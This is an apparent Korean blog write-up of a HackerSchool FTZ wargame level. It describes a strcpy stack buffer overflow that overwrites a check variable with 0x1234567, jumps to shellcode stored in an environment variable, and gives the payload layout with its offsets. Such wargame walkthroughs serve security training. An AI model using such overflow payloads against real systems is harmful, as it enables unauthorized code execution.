문제 분석
1. strcpy를 이용해 bof
2. 조건 : argc>1 && i==0x1234567
풀이
1. 변수 i의 위치 확인 : ebp-12
lea 0xffffbe8(%ebp), %eax => lea eax ebp-12
ebp-12 보면 0x1234567 확인 가능
2. 환경변수로 저장한 쉘 주소 획득 : 0xbffffbc9
쉘코드의 환경변수 등록 : https://pu1et-panggg.tistory.com/51
3. payload = dummy(1036bytes) + 0x1234567 + dummy(12bytes) + ret(shellcode)
= "a"*1036 + 0x1234567 + "a"*12 + 0xbffffbc9
'시스템 > FTZ' 카테고리의 다른 글
hackerschool FTZ : level 15 풀이 (0) | 2019.04.02 |
---|---|
hackerschool FTZ : level 14 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 11 풀이 (0) | 2019.04.01 |
hackerschool FTZ : level 10 풀이 (0) | 2019.03.30 |
hackerschool FTZ : level 9 풀이 (0) | 2019.03.30 |